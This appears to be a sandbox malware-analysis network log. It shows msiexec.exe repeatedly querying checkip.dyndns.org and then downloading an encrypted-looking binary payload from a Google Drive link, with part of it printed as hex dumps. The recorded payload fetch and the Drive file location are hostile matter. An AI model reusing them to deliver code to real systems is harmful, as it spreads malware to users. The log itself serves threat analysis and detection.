                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    3192.168.2.949917193.122.6.168807192C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Dec 24, 2024 11:28:37.436908007 CET151OUTGET / HTTP/1.1
                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                    Host: checkip.dyndns.org
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Dec 24, 2024 11:28:38.704668999 CET273INHTTP/1.1 200 OK
                                                                                                                                                                    Date: Tue, 24 Dec 2024 10:28:38 GMT
                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                    Content-Length: 104
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    4192.168.2.949925193.122.6.168807192C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Dec 24, 2024 11:28:40.489877939 CET151OUTGET / HTTP/1.1
                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                    Host: checkip.dyndns.org
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Dec 24, 2024 11:28:41.757795095 CET273INHTTP/1.1 200 OK
                                                                                                                                                                    Date: Tue, 24 Dec 2024 10:28:41 GMT
                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                    Content-Length: 104
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    5192.168.2.949933193.122.6.168807192C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Dec 24, 2024 11:28:43.544482946 CET151OUTGET / HTTP/1.1
                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                    Host: checkip.dyndns.org
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Dec 24, 2024 11:28:44.820162058 CET273INHTTP/1.1 200 OK
                                                                                                                                                                    Date: Tue, 24 Dec 2024 10:28:44 GMT
                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                    Content-Length: 104
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    6192.168.2.949944193.122.6.168807192C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Dec 24, 2024 11:28:46.632821083 CET151OUTGET / HTTP/1.1
                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                    Host: checkip.dyndns.org
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Dec 24, 2024 11:28:47.898505926 CET273INHTTP/1.1 200 OK
                                                                                                                                                                    Date: Tue, 24 Dec 2024 10:28:47 GMT
                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                    Content-Length: 104
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    7192.168.2.949952193.122.6.168807192C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Dec 24, 2024 11:28:49.675983906 CET151OUTGET / HTTP/1.1
                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                    Host: checkip.dyndns.org
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Dec 24, 2024 11:28:50.945177078 CET273INHTTP/1.1 200 OK
                                                                                                                                                                    Date: Tue, 24 Dec 2024 10:28:50 GMT
                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                    Content-Length: 104
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    0192.168.2.949859172.217.19.2384437192C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-12-24 10:28:18 UTC216OUTGET /uc?export=download&id=1s9TL-F4ttEqHxCwa9i4eX3qIKAGwYH6B HTTP/1.1
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                    Host: drive.google.com
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    2024-12-24 10:28:19 UTC1920INHTTP/1.1 303 See Other
                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Tue, 24 Dec 2024 10:28:18 GMT
                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=1s9TL-F4ttEqHxCwa9i4eX3qIKAGwYH6B&export=download
                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Content-Security-Policy: script-src 'nonce-YIPnytiK8t_BNil6_-0w_g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                                                                                    Server: ESF
                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Connection: close


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    1192.168.2.949866142.250.181.14437192C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-12-24 10:28:21 UTC258OUTGET /download?id=1s9TL-F4ttEqHxCwa9i4eX3qIKAGwYH6B&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    2024-12-24 10:28:24 UTC4942INHTTP/1.1 200 OK
                                                                                                                                                                    X-GUploader-UploadID: AFiumC5o8fsKEGNcuW5imdVA6bWAFJq27GWtT6UhS1bh4SrwQgE51917H4dRQphtPp1PgexncYjq4u0
                                                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                                                    Content-Security-Policy: sandbox
                                                                                                                                                                    Content-Security-Policy: default-src 'none'
                                                                                                                                                                    Content-Security-Policy: frame-ancestors 'none'
                                                                                                                                                                    X-Content-Security-Policy: sandbox
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Cross-Origin-Embedder-Policy: require-corp
                                                                                                                                                                    Cross-Origin-Resource-Policy: same-site
                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                    Content-Disposition: attachment; filename="dBnTcfeWuIVk46.bin"
                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                    Access-Control-Allow-Credentials: false
                                                                                                                                                                    Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                                                                                                                                                                    Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                    Content-Length: 277056
                                                                                                                                                                    Last-Modified: Mon, 23 Dec 2024 10:16:28 GMT
                                                                                                                                                                    Date: Tue, 24 Dec 2024 10:28:23 GMT
                                                                                                                                                                    Expires: Tue, 24 Dec 2024 10:28:23 GMT
                                                                                                                                                                    Cache-Control: private, max-age=0
                                                                                                                                                                    X-Goog-Hash: crc32c=opvYFw==
                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Connection: close
                                                                                                                                                                    2024-12-24 10:28:24 UTC4942INData Raw: 25 49 c1 25 9e 9e d5 f7 48 fc a5 19 1c 41 c4 80 3b 4a ce ac 07 a9 59 58 b9 c1 3e 50 11 8f 3c 77 4e 75 7c f0 95 d9 de 83 f7 14 80 29 89 0d b7 0a bf 45 b8 15 5b 40 1c 4d 80 2e c1 06 31 b9 e5 35 05 55 fe f5 0b 48 0f 50 b3 f7 07 5f 78 1b 20 30 61 9f c0 46 3a 23 6c cf 7f d5 46 57 52 06 65 5b 77 f6 c0 3a 94 f1 c3 1e b5 75 22 e7 f5 a0 4a 33 36 2d 3a 24 3d ea fd db d9 5d 25 54 0e 59 f6 88 c2 b7 6a ab f7 b5 a4 8e f3 27 92 64 fa fb ae b0 27 22 bd 9e 72 57 ac 76 7f 34 09 56 8d 03 d1 38 9b c3 9c ad c5 9f c0 ae 7f 07 b1 6e 32 79 d3 ed 4f 58 7b b9 02 c9 5d 90 5b 29 1f 53 79 aa 31 51 ab ca 65 90 49 aa 0b b1 8f 42 93 22 9f 33 65 40 da ad 32 9a 2d 7a af 6c 69 46 87 cd 43 05 16 d1 a6 bf 12 12 fd 93 f5 c6 df f4 87 c6 f4 fb 96 bf ea cd 44 42 b0 b3 7d d9 4b a7 32 4f ef b5 cb
                                                                                                                                                                    Data Ascii: %I%HA;JYX>P<wNu|)E[@M.15UHP_x 0aF:#lFWRe[w:u"J36-:$=]%TYj'd'"rWv4V8n2yOX{][)Sy1QeIB"3e@2-zliFCDB}K2O
                                                                                                                                                                    2024-12-24 10:28:24 UTC4812INData Raw: bc 39 10 5d 9e 5e 9d 46 80 e6 07 17 1f f5 1d eb 83 39 ce 08 21 e7 74 90 47 cc 2e 65 65 c4 96 20 47 5c b7 7b 8f 11 e6 a1 e2 1a 8c 49 1d e4 d1 16 e6 d5 54 59 85 0e 4c 12 00 21 71 11 41 f7 f7 57 69 cc ae b1 c4 76 73 71 ad 48 a8 0e 0e 32 b4 36 00 30 cc b1 36 c1 f0 da da 90 d9 d7 85 f2 82 8a b7 1e e6 9a 79 34 30 18 3d a7 f6 73 29 c3 91 3d 15 57 b0 d8 0d 5c b7 98 91 7a f8 51 34 77 22 d0 6e d0 0f 6a 69 3c 18 a3 c9 07 9c 9d cb 56 e8 f6 f5 8b 29 0c ff a4 28 bf 20 cd 99 c1 0e 72 27 06 99 98 49 6e dc c3 76 7d 5d 9e c0 df a1 0a 59 0a 5f be 10 65 2a a1 7e 11 69 a6 c6 92 ff 1d f5 80 a2 19 04 9f f4 21 e7 f5 94 73 2f ed 17 cb c7 a6 26 da 64 99 90 85 2e 2c 5f 2c 6f 47 1b 9d d3 26 21 0b f4 69 5f d5 49 af a9 b4 76 93 95 98 a0 46 cf 6e fd ca f1 f6 ee 0f d9 b0 28 89 7c 65 9c
                                                                                                                                                                    Data Ascii: 9]^F9!tG.ee G\{ITYL!qAWivsqH2606y40=s)=W\zQ4w"nji<V)( r'Inv}]Y_e*~i!s/&d.,_,oG&!i_IvFn(|e
                                                                                                                                                                    2024-12-24 10:28:24 UTC1324INData Raw: ce b5 63 8d 3a 0a dc 4c b6 fe 28 ac ee ec 5c 1b 36 62 d0 05 00 8c a2 7f 8a 84 7f 33 94 7c 07 a6 60 5b dd fb ae 0c 3e b5 8c c4 01 19 3c 45 f7 63 7e 65 a0 29 91 65 46 d4 95 69 0c bb 35 22 dc 34 da 0d df 23 7e 65 5e a0 71 2d ae d3 aa 78 9e 50 9d e4 1d 5e c6 aa 9d 71 38 ea 81 4e 3a c3 0d 41 2d 7a de f8 ee f8 db 76 1d 07 68 d6 bd 46 6b a8 a0 77 51 fe 37 fa d9 fb f7 64 73 3c 41 f1 ff f2 13 86 88 34 58 d9 5f 54 17 28 2d 9b 65 09 46 54 ce c4 4f 38 90 d4 93 11 e3 97 cf 35 44 77 ec be 47 3d e8 2c 6a 40 79 2e 00 19 4a bd e1 2c 9e 48 b8 2e 5e 99 c9 38 83 27 17 9d d1 0b bd f1 bb 13 8b cd b3 6c 76 45 fb d1 79 f2 f8 6b 76 96 f5 0d a5 25 42 e2 ff a5 5f 94 b0 b7 c9 72 67 65 11 ef c4 c1 68 96 2e cf 44 dd b1 76 3f f4 8f e9 52 7e 25 24 f2 c2 9c c9 5d b8 31 79 78 2d be e7 b0
                                                                                                                                                                    Data Ascii: c:L(\6b3|`[><Ec~e)eFi5"4#~e^q-xP^q8N:A-zvhFkwQ7ds<A4X_T(-eFTO85DwG=,j@y.J,H.^8'lvEykv%B_rgeh.Dv?R~%$]1yx-
                                                                                                                                                                    2024-12-24 10:28:24 UTC1390INData Raw: 99 fd 73 3b 35 3b 04 52 36 98 2e d1 40 aa 1f f6 f6 7b b1 d4 ae 7d 81 05 1e bd cd 1a 60 2b c7 f4 f4 cf 14 38 fb dd 20 6e fb 2d 2c 77 1c e0 02 2c ff a6 e7 ed 2e de 0f 70 85 ed ca 41 1e 6f b1 20 83 1d 14 dc 88 fc 2a 3d c4 fd c7 cb a0 32 9c b3 6e c3 f6 51 36 7a 77 2c 8d 78 2a 5a 6e 73 e8 7f 4f f9 c0 5e b0 e4 ef b6 a3 e4 08 9e 14 73 88 82 44 eb 47 da 48 b9 96 f7 a2 8b 3a 5d b6 f0 69 e8 3c d0 eb 9f 8a ca 24 17 85 48 a0 c3 3a de 14 a5 49 ff 2b 34 c1 a6 6f 2c f9 39 b3 1b 62 bf 1a 53 6c 1d b3 2f 1a 19 ae 68 75 b9 6c 73 40 0b f5 65 cb ef df b3 d9 3f 7c 76 79 b8 0b 09 55 e7 a1 65 99 3a d3 03 d4 e5 1b 33 f5 4a 66 cf 7b 4f c3 1a bc ff 56 96 3f 03 60 78 93 50 8d 26 05 b1 33 d8 de f7 96 78 98 65 1f 27 23 9d e6 9b 41 eb 88 49 22 d9 92 57 3d ee 97 ce e7 a6 1a f1 b2 5b c0
                                                                                                                                                                    Data Ascii: s;5;R6.@{}`+8 n-,w,.pAo *=2nQ6zw,x*ZnsO^sDGH:]i<$H:I+4o,9bSl/huls@e?|vyUe:3Jf{OV?`xP&3xe'#AI"W=[
                                                                                                                                                                    2024-12-24 10:28:24 UTC1390INData Raw: 6e 45 c0 e4 75 b1 47 bf 89 b4 00 c2 72 4e 78 8d cd fc 88 1c ee b9 34 d8 8a 01 74 3a 53 fa 45 e8 e2 17 14 95 9b 9b 34 ff 28 0f 15 d2 fb 81 2d 2b 79 59 09 01 24 08 48 05 41 b0 98 d4 5f 87 ee 20 4e e5 9f c0 42 49 ea 6c cf 35 c6 4e 29 63 06 65 5f 05 63 c2 3a e4 e7 eb 9f b5 75 28 f1 0b a1 59 3a 27 24 16 28 2c e2 ea b4 13 5d 25 5e 8e 59 dd 83 cc b9 d8 b3 98 cb ad 43 d8 9f 93 39 3f a4 c4 d8 4e 55 b5 25 00 38 c1 6b d2 59 29 3f ec 7c b7 29 d5 e3 fe cc 9b d6 b5 c0 5b 1d 63 4e 76 3c ef 00 22 37 15 dc 3d cc 41 9c 10 e7 1f 53 73 aa 20 57 94 40 65 90 0f ab 20 d5 56 c7 05 44 41 23 40 68 ee ad 32 90 de 70 ad 45 00 47 d7 c7 9d 21 12 d1 a6 d5 27 12 fd 97 87 53 a3 b7 f3 d0 dc 5a 96 bf e0 bb be 43 a3 b8 2c d2 72 4c 33 4f ef c9 e0 0d 49 cc e0 c9 47 63 e1 67 64 20 49 44 3a ad
                                                                                                                                                                    Data Ascii: nEuGrNx4t:SE4(-+yY$HA_ NBIl5N)ce_c:u(Y:'$(,]%^YC9?NU%8kY)?|)[cNv<"7=ASs W@e VDA#@h2pEG!'SZC,rL3OIGcgd ID:
                                                                                                                                                                    2024-12-24 10:28:24 UTC1390INData Raw: e1 50 8b 77 c5 2e a1 62 c4 94 00 47 5c 0b 7a f1 0d fd a1 e6 75 aa 48 1d ee ad 4c e7 d5 24 4f ad 8f 4c 12 0a 37 8e 12 4b f1 19 f4 6e cc 76 ce f7 76 63 75 df dd ef 0e 7e 25 87 87 03 30 77 a7 c8 c0 e8 dd e3 a5 d8 d7 ad 85 52 df bd 15 e0 9a 0e 34 30 18 4c e3 ba 73 59 de 73 5a 15 57 bb fd 1c 3d e3 15 ce 7e d0 54 5b 12 24 bf dd d0 08 67 74 7d 0d a3 b3 28 a8 fa cb 5c 9c d2 9d 8b 2d 2e b9 a4 5b dc 5e d2 93 d2 0e 5a 7c 02 91 85 98 10 c8 d7 54 d4 58 9e db ae 51 61 59 0b 59 ad 1e 06 45 b3 11 0d 06 1d cc 92 2b 13 fd ef e6 35 0c 8a 8c 0d e6 f5 90 0a 93 31 06 c5 c7 76 26 da 64 94 66 d1 2e 3d 50 1d ea 16 1e f2 d3 03 37 73 ef a0 81 ab eb 9b ba b0 ca 82 91 fd 03 63 d7 16 9a 19 f8 ae 22 2a c0 c4 1a 57 70 61 39 15 83 a5 a1 d8 d5 b9 29 79 86 be d2 da e2 b0 73 8f a6 f0 ca 03
                                                                                                                                                                    Data Ascii: Pw.bG\zuHL$OL7Knvvcu~%0wR40LsYsZW=~T[$gt}(\-.[^Z|TXQaYYE+51v&df.=P7sc"*Wpa9)ys
                                                                                                                                                                    2024-12-24 10:28:24 UTC1390INData Raw: 1d d5 10 34 94 e2 5e cf 43 65 4f 34 2d 31 bd eb 49 4a 55 a9 38 31 23 c1 25 04 67 06 87 bf 84 ab 83 fc 1c 9a a6 7e 92 61 6d 45 d1 79 c0 99 4e 6e e4 92 02 b3 7d 96 c7 e6 d1 67 b4 b0 bf 6b 57 55 60 9a e0 ce b1 d6 3e 75 b1 6e dc 94 64 ef 77 98 9b bb 59 64 54 50 ec 4b ec 4a cc 1b b1 78 29 16 c2 d6 a5 6e 87 07 50 61 98 67 b8 11 e6 9e 9a 55 24 ab 33 83 ec 1d 4e f1 73 82 2f a5 cb b4 7a 91 13 9f de 3e fb 93 94 50 d8 5f c4 a1 20 d6 37 c1 9d 6d 6e 9e a2 74 3a f8 fb 94 10 6f 90 d7 84 35 3a 36 46 eb c0 7f ce be 20 5d 4a d8 61 c1 a5 9b 45 94 b0 b4 47 6c 89 72 d0 ae 04 fb 8f 6d 72 a0 06 ee a8 e8 e4 e8 65 82 7b 49 45 23 0b 31 78 fc 82 14 24 ed 63 4b 07 1b b2 27 35 ef f8 97 7a 5d 69 8a e7 10 7a 30 a9 ff 19 db 44 b9 8e ed b3 e2 2d e3 1c 74 91 93 1f bf 99 dd 64 62 5e 6d 2f
                                                                                                                                                                    Data Ascii: 4^CeO4-1IJU81#%g~amEyNn}gkWU`>undwYdTPKJx)nPagU$3Ns/z>P_ 7mnt:o5:6F ]JaEGlrmre{IE#1x$cK'5z]iz0D-tdb^m/
                                                                                                                                                                    2024-12-24 10:28:24 UTC1390INData Raw: d2 50 ee ef 0e 19 65 15 2d 3c 0c 4d 88 65 f0 ac bb 72 c4 16 3b 3a e7 f9 ea f1 d4 5d fe 6e f5 71 25 c4 53 93 dd 97 c5 ac 03 1a 4c 89 cc 10 3b 29 d9 bb 85 cc 4d e3 ed fb ac 4e 64 0e 14 35 4f 68 b7 bf 87 9e 15 e2 41 00 30 05 32 7b ff 00 9a 00 5e b8 89 89 ba 5f 16 c9 70 bf 9e be 08 36 83 d4 33 85 b2 9b 86 c1 17 40 b5 db e6 0c 71 89 9b b2 71 88 55 0e 46 e8 dd cb bd 58 ab ce 8d 0f 33 c4 fa 64 81 ae ec 6f b8 c8 43 fc 35 fc 56 36 79 8e b3 90 a5 89 68 76 33 c7 94 8b 1c 39 0f cb 70 ee da fc 7d 5b 44 70 eb a1 0b 3b ce a1 1b 8c be 58 05 81 a4 5e e7 ae d4 e2 7a b6 8c 28 c5 94 98 f6 72 83 53 b5 8b 8c 46 51 ab dc 36 36 d5 f0 bd 12 73 ad ba 6d 03 51 b9 90 ef 1a 90 e5 28 43 46 49 57 7d 09 32 cf 5b ef 55 fa a8 72 b4 3a 0a d2 ee 4f 3a 49 b8 c5 d8 2c b9 19 6a ab 25 28 ee a6
                                                                                                                                                                    Data Ascii: Pe-<Mer;:]nq%SL;)MNd5OhA02{^_p63@qqUFX3doC5V6yhv39p}[Dp;X^z(rSFQ66smQ(CFIW}2[Ur:O:I,j%(
                                                                                                                                                                    2024-12-24 10:28:24 UTC1390INData Raw: e4 d8 e5 ad 30 e0 95 aa 43 e1 4b 87 36 ed ca ad b9 3c 4a c8 b8 80 62 78 95 54 68 5e 7b e6 1f b5 ef 42 cb a6 49 39 47 ff a9 d8 9e 91 4e 61 14 68 87 9f fa 8f 0d db 6c 8a 87 e7 12 75 bd d4 7f be 9a 0e e4 bd ee 27 b0 a7 44 24 fa 50 c9 65 26 45 9e cc 4e f1 f9 2d 58 7c 56 a2 f2 9c 1f 3d bb a0 90 e4 e8 e9 c4 07 9e 49 88 03 64 a2 eb 58 fe 9d d9 59 a2 6f de 6d ea 11 ea c2 2e e8 55 c6 fd dd 83 9d 6f 73 12 e4 c3 4a 1a 73 15 03 08 ae 39 38 78 e4 b9 7d 05 fa 6a bb 21 f9 b4 f1 e7 19 bf ef bf 7d 98 be 0b 2f ae dd 4a 79 0c f5 0e 8c 36 b0 74 d1 3e 97 02 7b b2 09 24 d7 8b 1b e5 60 90 bd bd b2 53 c2 ee 53 d1 de 3b b6 82 d8 df 49 f4 2d 5d f0 2f 8b 47 02 ff d6 41 6a 1c ec c9 fb 8a e7 18 c6 23 06 a8 05 83 6d b2 5b b4 9e 60 a4 cb f9 15 4c 92 35 ad b0 64 dc 08 74 2d 0e 44 0d 96
                                                                                                                                                                    Data Ascii: 0CK6<JbxTh^{BI9GNahlu'D$Pe&EN-X|V=IdXYom.UosJs98x}j!}/Jy6t>{$`SS;I-]/GAj#m[`L5dt-D
                                                                                                                                                                    2024-12-24 10:28:24 UTC1390INData Raw: e9 a0 b1 0f d9 be 50 c2 72 65 eb 26 b1 56 2a d7 df df 75 5d 8e d2 df c8 ce b8 0d 70 b1 9f 0a a1 8d e1 11 92 c7 60 76 32 c3 1a cc 82 a7 01 9d 96 ce 93 5d 63 fe fb 8e cf 5c fb d9 a3 cf 00 1a db 28 e4 48 ec 9d db 31 52 d0 46 2e 97 d7 23 eb e8 a8 42 13 2f 98 3c 83 ee 28 c1 80 e6 18 b4 7c 67 77 67 72 d1 a8 ab d3 90 82 76 9c 84 c7 d7 46 e2 9c 0d 1b 9c f0 d1 ed 55 49 da f2 db 3d de 62 97 e9 3a 87 5e bd 75 b9 b9 35 8a 9b b2 20 25 75 2b 68 cd 7a 12 50 53 3e 22 65 7d 7e dd 0b fb 63 c2 43 e5 b3 58 20 e1 72 95 de ea 07 a6 ea 9a ee 3e 91 db 0c 7c da a8 d1 2c ca 09 9c 34 86 fd e3 dd 64 4f 53 fe ed a2 30 65 25 9c 9b 95 bd da 33 75 46 3f fb 85 85 1d 62 3a 48 78 f5 78 ea 27 25 b7 f7 0d 4c 92 9a 16 30 d9 9b b2 77 2b 23 1c d9 17 54 46 57 58 10 9b 5a 64 e0 d1 2c ad 27 c3 1e
                                                                                                                                                                    Data Ascii: Pre&V*u]p`v2]c\(H1RF.#B/<(|gwgrvFUI=b:^u5 %u+hzPS>"e}~cCX r>|,4dOS0e%3uF?b:Hxx'%L0w+#TFWXZd,'


